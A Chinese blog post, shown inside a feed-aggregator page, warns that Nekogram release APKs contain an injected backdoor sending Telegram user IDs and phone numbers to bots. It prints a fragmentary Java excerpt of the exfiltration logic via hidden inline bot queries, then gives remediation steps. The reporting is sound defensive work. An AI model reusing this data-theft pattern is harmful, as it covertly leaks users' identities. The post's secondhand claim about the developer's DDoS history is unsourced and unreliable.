惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Recent Announcements
Recent Announcements
J
Java Code Geeks
雷峰网
雷峰网
Microsoft Security Blog
Microsoft Security Blog
博客园 - 【当耐特】
腾讯CDC
博客园 - 司徒正美
B
Blog RSS Feed
博客园 - 三生石上(FineUI控件)
I
InfoQ
N
Netflix TechBlog - Medium
L
LangChain Blog
博客园_首页
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
T
Tailwind CSS Blog
MyScale Blog
MyScale Blog
美团技术团队
The Cloudflare Blog
爱范儿
爱范儿
Stack Overflow Blog
Stack Overflow Blog
博客园 - 聂微东
H
Help Net Security
Martin Fowler
Martin Fowler
V
Visual Studio Blog

Chongxiの咖啡屋

Google相册迁移到iCloud分享 - Chongxiの咖啡屋 讲讲「万物皆虚,万事皆允」 - Chongxiの咖啡屋 舞萌DX 落雪查分器使用指南 - Chongxiの咖啡屋 现代人的刻舟求剑 - Chongxiの咖啡屋 舞萌DX错误码0010深度解析及处理方法 - Chongxiの咖啡屋 做了一个明日方舟-奇象巡展的像素画拼豆工具 - Chongxiの咖啡屋 舞萌DX国服封禁机制详解 - Chongxiの咖啡屋 舞萌开机网络自检底层技术说明,断网如何排查讲解 - Chongxiの咖啡屋 舞萌机台开机初始化进程详解 - Chongxiの咖啡屋 为什么喜欢音乐 反而不该去学音乐? - Chongxiの咖啡屋 从装逼到嘉豪:中国互联网的精神胜利进化史 - Chongxiの咖啡屋 游蒋介石故居:奉化溪口 - Chongxiの咖啡屋 钢铁雄心4 steam正版导入全DLC补丁 - Chongxiの咖啡屋 漫漫长夜全地图及介绍 - Chongxiの咖啡屋 记一次无需实名换绑米哈游通行证手机号 - Chongxiの咖啡屋 邮储银行万事达借记卡全面指南 - Chongxiの咖啡屋 x402:一个来自27年前的状态码能救活被ai榨干的「人类网站」吗 - Chongxiの咖啡屋 舞萌国人口大普查:全服玩家数据分析 - Chongxiの咖啡屋 家中网络「捉奸」记 - Chongxiの咖啡屋 中国移动PT927G光猫折腾指南:破解超级密码改桥接 - Chongxiの咖啡屋 最好用的Android邮件客户端推荐 - Chongxiの咖啡屋 如何验证对方是不是Chongxi我本人 - Chongxiの咖啡屋 三星S20系列刷入移植OneUI8流程 - Chongxiの咖啡屋 使用obisidian和git插件来完美管理静态博客 - Chongxiの咖啡屋 玩客云拆机教程 - Chongxiの咖啡屋 母语级英语的本质,不是英语 - Chongxiの咖啡屋 我用过最好用的Android桌面(启动器) - Chongxiの咖啡屋 1. 区块链基本知识 - Chongxiの咖啡屋 b站创作激励提现几乎无门槛了 - Chongxiの咖啡屋 速报:APKPure 版 Telegram 被植入恶意后门 - Chongxiの咖啡屋
Nekogram后门事件:你的手机号已被偷偷上传 - Chongxiの咖啡屋
Chongxi · 2026-04-03 · via Chongxiの咖啡屋

TL;DR:如果你用过 Nekogram,你的手机号和 Telegram 账号 ID 已经被发送给了开发者。请立即切换回官方客户端

发生了什么#

近日,安全研究人员对 Nekogram 的发布版 APK 进行逆向分析,发现其中存在蓄意注入的恶意代码,会在用户毫不知情的情况下,将以下信息上传给开发者:

  • 你的 Telegram 用户 ID
  • 你的 手机号码
  • 如果你登录了多个账号,所有账号的上述信息

技术细节#

恶意代码藏在 Extra.java 文件中,没有出现在公开的 GitHub 源码里——开发者是在打包发布时偷偷注入的,所以单看源码根本发现不了

代码逻辑很简单粗暴:

PRTCL // JAVA

// 遍历最多 8 个账号

for (int i = 0; i < 8; i++) {

// 抓取用户 ID 和手机号

mapWithAccounts.put(String.valueOf(user.id), phonenum);

}

// 通过 inline query 悄悄发给 bot,不留任何聊天记录

InlineBotHelper.getInstance(...).query(nekonotificationbot, ...toJSON(hashMap));

数据通过 Inline Bot Query 方式发送,这种方式的特殊性在于:不会在你的聊天记录里留下任何痕迹

目标接收方包括:

  • @nekonotificationbot(主要数据接收 bot)
  • tgdb_search_bot(OSINT 人肉搜索 bot)
  • usinfobot(OSINT 人肉搜索 bot)

后两个 bot 的出现意味着,泄露的数据很可能被用于社工查询

为什么格外危险#

  1. Google Play 版本同样中招,不只是从第三方渠道下载的 APK
  2. 早期版本只针对 +86 号码,现已扩展至所有用户
  3. Nekogram 作者据悉有 DDoS 攻击和网络骚扰前科
  4. 该 issue 已在 GitHub 公开:#336

你现在应该做什么#

1.立即卸载 Nekogram,切换回 官方 Telegram

2.检查登录设备 设置 → 隐私与安全 → 活跃会话 → 踢掉所有陌生设备

3.开启两步验证 设置 → 隐私与安全 → 两步验证

4.限制手机号可见性 设置 → 隐私 → 手机号码 → 改为”我的联系人”或”没有人”

5.向 Google Play 举报 举报链接


非官方客户端的源码和发布版二进制文件可以完全不同。你看到的源码,不等于你运行的程序

以后下载 Telegram 请只认一个地址:telegram.org

参考来源:Sota Project、GitHub Issue #336